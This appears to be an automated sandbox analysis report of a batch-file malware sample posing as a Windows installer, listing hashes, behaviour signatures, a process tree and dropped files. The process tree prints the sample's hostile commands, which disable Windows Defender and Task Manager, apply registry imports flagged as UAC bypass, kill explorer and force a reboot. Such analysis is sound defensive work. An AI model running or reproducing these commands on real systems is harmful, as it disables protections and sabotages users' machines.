Analysis

  • max time kernel
    27s
  • max time network
    33s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    02-03-2024 20:29

Errors

Reason
Machine shutdown

General

  • Target

    TheMalwaredev-s-garbage-main/Install Windows20/installer/main.bat

  • Size

    3KB

  • MD5

    5f54a2c61397eb3d4f1bc8e9736fec2a

  • SHA1

    5c3ad25b0bff96ad74d2743b15089847d6be2d40

  • SHA256

    9995fab89f303652abc14b153ea864d9a5e39e20c8077d165e9944948eeeb968

  • SHA512

    d7c84ac92cb35aca9fb4c2e7bb43924e5033ad49a9b4fcee320386a5d0bfddf2ec674e33a575c0848b9d274bebeb4dc9abca0360493c968bbc29c7a09438141f

Malware Config

Signatures

  • UAC bypass (3 TTPs, 16 IoCs)
  • Disables Task Manager via registry modification
  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up country code configured in the registry, likely geofence.

  • UPX packed file (8 IoCs)

    Detects executables packed with UPX/modified UPX open source packer.

  • AutoIT Executable (2 IoCs)

    AutoIT scripts compiled to PE executables.

  • Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  • Drops file in Windows directory (16 IoCs)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe (1 IoC)
  • Kills process with taskkill (1 IoC)
  • Modifies data under HKEY_USERS (15 IoCs)
  • Modifies registry class (20 IoCs)
  • Modifies registry key (1 TTP, 2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (3 IoCs)
  • Suspicious use of SetWindowsHookEx (1 IoC)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\main.bat"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4056
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\update.vbs"
      2⤵
      PID:3332
    • C:\Windows\system32\timeout.exe
      timeout 20
      2⤵
      • Delays execution with timeout.exe
      PID:1740
    • C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Public\temp\noescape.bmp /f
      2⤵
      • Sets desktop wallpaper using registry
      PID:4776
    • C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      2⤵
      PID:3776
    • C:\Windows\system32\reg.exe
      Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      PID:468
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoTrayItemsDisplay" /t REG_DWORD /d "1" /f
      2⤵
      PID:1304
    • C:\Windows\system32\reg.exe
      reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1
      2⤵
      • Modifies registry key
      PID:2628
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoPinningToTaskbar" /t REG_DWORD /d "1" /f
      2⤵
      PID:2216
    • C:\Windows\system32\reg.exe
      reg import virus.reg
      2⤵
      PID:776
    • C:\Windows\system32\reg.exe
      reg import here.reg
      2⤵
      • UAC bypass
      PID:1564
    • C:\Windows\system32\reg.exe
      reg import death.reg
      2⤵
      PID:3876
    • C:\Windows\system32\reg.exe
      reg import no.reg
      2⤵
      • UAC bypass
      PID:5100
    • C:\Windows\system32\reg.exe
      reg import password.reg
      2⤵
      PID:1680
    • C:\Windows\system32\reg.exe
      reg import color.reg
      2⤵
      PID:1856
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
      2⤵
      PID:2568
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
      2⤵
      PID:2260
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
      2⤵
      PID:4336
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
      2⤵
      PID:752
    • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\mover.exe
      mover.exe
      2⤵
      PID:652
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
      2⤵
      PID:2192
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
      2⤵
      PID:3988
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
      2⤵
      PID:1248
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
      2⤵
      PID:2644
    • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
      x.exe
      2⤵
      PID:4068
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B2B6.tmp\x.cmd""
        3⤵
        PID:1504
    • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
      x.exe
      2⤵
      PID:4120
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B2B9.tmp\x.cmd""
        3⤵
        PID:4924
    • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
      x.exe
      2⤵
      PID:3712
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B2C5.tmp\x.cmd""
        3⤵
        PID:5016
    • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
      x.exe
      2⤵
      PID:3312
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B2B7.tmp\x.cmd""
        3⤵
        PID:1600
    • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
      x.exe
      2⤵
      PID:2348
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B2B8.tmp\x.cmd""
        3⤵
        PID:3660
    • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
      x.exe
      2⤵
      PID:3168
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B2C6.tmp\x.cmd""
        3⤵
        PID:3544
    • C:\Windows\system32\reg.exe
      reg import im.reg
      2⤵
      PID:4588
    • C:\Windows\system32\reg.exe
      reg import systemmessage.reg
      2⤵
      • UAC bypass
      PID:3992
    • C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      2⤵
      • Modifies registry key
      PID:3584
    • C:\Windows\system32\reg.exe
      reg import UAC.reg
      2⤵
      • UAC bypass
      PID:4132
    • C:\Windows\system32\reg.exe
      reg import inkfile.reg
      2⤵
      • Modifies registry class
      PID:3908
    • C:\Windows\system32\shutdown.exe
      shutdown /r /t 0
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3900
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa3947855 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:3612

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\note.txt
    Filesize: 385B
    MD5: 1ebb3ddb5424eae8205a111a3b4e2237
    SHA1: 7f6603ae0410ea2dc5adfd879632039b0eee955a
    SHA256: efc4f3065ab66661a92daebbf770103b2e8306d3985ac5c5ae816e0f64e6ab4e
    SHA512: cc9d3d208f97f8f9f46865ce75257cff6616e49f49b90e1273fa923c1d7c05c68e0ea35eec3361de4167839acec86e03c40cf4f1bf7bb039ec91cd4f8e3c855f

  • C:\Users\Admin\AppData\Local\Temp\B2B9.tmp\x.cmd
    Filesize: 76B
    MD5: 5156c0df260ccc7bc13b73b6de4d9a25
    SHA1: e6f8b1f6ef658a1f5772b83c898088330184d291
    SHA256: 565850ac8c04867b561958ea678143b383499e729aebace9c84bec0484772b88
    SHA512: d2e7d791e6ccbf6389659d4fa673bbbb837a8ccbdfec287ff6a5d8a385e9aad413d692bc5cf93cae4d8292f565a7e9ddcc437da97a9b5fdd0c4526c4ca69cc39

  • C:\Users\Public\Desktop\Escape.vbs
    Filesize: 23B
    MD5: 23873c064655ec26585bb489cab1965c
    SHA1: 575d47d57ddb6ffb5335f5d48f6bd222e17af599
    SHA256: 828653c66fd126cb9f30a8fc566887d3ae54376ccba637101ae8e0889a6a3b63
    SHA512: 44517e1b3e6ba403d99e3ae6d9340ea3e856a50e4bec3740d3530d066f28677b78ea2a25ebf63df948469dde04547044483bb9d37a5cf79e8b3ea3544bfaf348

  • C:\Users\Public\Desktop\Hacking2.vbs
    Filesize: 182B
    MD5: 81c5f570e4fb185d0d675c450741f28b
    SHA1: cc7c042a8ec903ea5fd4171ffa2dfe57e8a5586a
    SHA256: 0c32196e293badc8b917f22ecf9d746c631678a15704dc829d594e1e04f01376
    SHA512: 2434226097e83942ddade8a98efaa2d912f8030180729fd6ccedbe70091d262a8d1ac080ae41a6c5ac37c4303c79bbdea8d6fa86828759651536532cb2fa5936

  • C:\Users\Public\Desktop\setup3.exe
    Filesize: 22KB
    MD5: 9d0cbe0006b8e6760679bf893c5d848f
    SHA1: a85c9378a962f1f3454ec34ce596dea318031618
    SHA256: 41bb8333a815138ccdc1809c33d3263d67834b2493c6b8eeebd5dde3d1ffe20c
    SHA512: 13f513d75235da33bb032901b506c718cece2f7f9d0fbe4bd9d3508f9efca208b10a319b130ec98327b6c5e054abcf7d052ce3e672f2c1c38bac1c162d4358e2

  • C:\Users\Public\Music\FREE SOLARIS.vbs
    Filesize: 37B
    MD5: ac910281f16a464b6257102b715ffafc
    SHA1: 590add7ed48a1d5fa78093812ef88f9d0dfbb7c5
    SHA256: afb4e7e0f799d76ec4b197427b0933935eddd933baf6379875b3c37eb6b1bc6e
    SHA512: a62b9363acf0628ec373a33409f13e161779f0d28b0dd163b53d4ec9135b172e68c10dfb37a5459e51ec636ff3e23cc17de4a846d273e5a3e9149abe41a806ad

  • C:\WinKernel64.bat
    Filesize: 113B
    MD5: 284e7e79635ec15370bb7530d20f6b7e
    SHA1: 471f6b7bc91a8c6b51f291c75126a38b082a92ce
    SHA256: 4d81298082414e092ccb0dab56007df80a1930b60315a5b759bf1d10d8c11235
    SHA512: 3bcbce046df39bf285a2e63f83374fc0c6b809b4ee5091744496244b5929753f102402c87671205ae9b7caa78b12328cabfae1523fe6abbc5abd6e66cae57e24

  • C:\Windows\updatepush.exe
    Filesize: 548KB
    MD5: c1978e4080d1ec7e2edf49d6c9710045
    SHA1: b6a87a32d80f6edf889e99fb47518e69435321ed
    SHA256: c9e2a7905501745c304ffc5a70b290db40088d9dc10c47a98a953267468284a8
    SHA512: 2de11fdf749dc7f4073062cdd4881cf51b78e56cb27351f463a45c934388da2cda24bf6b71670b432c9fc039e24de9edd0e2d5382b67b2681e097636ba17626e

  • memory/652-56-0x0000000140000000-0x0000000140126000-memory.dmp
    Filesize: 1.1MB

  • memory/652-86-0x0000000140000000-0x0000000140126000-memory.dmp
    Filesize: 1.1MB

  • memory/2348-87-0x0000000000400000-0x0000000000410000-memory.dmp
    Filesize: 64KB

  • memory/3168-92-0x0000000000400000-0x0000000000410000-memory.dmp
    Filesize: 64KB

  • memory/3312-91-0x0000000000400000-0x0000000000410000-memory.dmp
    Filesize: 64KB

  • memory/3712-90-0x0000000000400000-0x0000000000410000-memory.dmp
    Filesize: 64KB

  • memory/4068-88-0x0000000000400000-0x0000000000410000-memory.dmp
    Filesize: 64KB

  • memory/4120-57-0x0000000000400000-0x0000000000410000-memory.dmp
    Filesize: 64KB

  • memory/4120-89-0x0000000000400000-0x0000000000410000-memory.dmp
    Filesize: 64KB